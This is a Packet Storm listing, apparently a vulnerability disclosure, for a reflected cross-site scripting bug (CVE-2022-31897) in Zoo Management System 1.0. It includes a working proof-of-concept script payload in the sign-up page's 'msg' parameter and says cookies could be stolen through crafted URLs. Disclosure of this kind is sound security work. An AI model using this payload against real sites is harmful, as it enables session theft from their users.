exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Zoo Management System 1.0 Cross Site Scripting

Zoo Management System 1.0 Cross Site Scripting
Posted Jun 22, 2022
Authored by Angelo Pio Amirante

Zoo Management System version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2022-31897
SHA-256 | c2c4aa85cb3df00f1fddb60ea24a09058f2a8faf14d274c3e8673a5ae5d6286f

Zoo Management System 1.0 Cross Site Scripting

Change Mirror Download
# Exploit Title: Zoo Management System 1.0 - Reflected Cross-Site-Scripting (XSS)
# Date: 06/22/2022
# Exploit Author: Angelo Pio Amirante
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15344/zoo-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Server: XAMPP on Windows 10
# CVE: CVE-2022-31897

# Description:
Zoo Management System 1.0 is vulnerable to reflected cross-site scripting on the sign-up page. The "msg" parameter in 'http://localhost/public_html/register_visitor?msg=' is vulnerable.

# Impact:
An attacker could steal cookies with a crafted URL sent to the victims.

# Exploit:

Visit the following page:

1) http://localhost/public_html/register_visitor?msg=<script>alert(window.navigator.userAgent)</script>

2) Alert pop up is fired!


# Image poc:

https://ibb.co/8XKDgJX -> Registration page
https://ibb.co/mTTmTmy -> XSS


Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    8 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close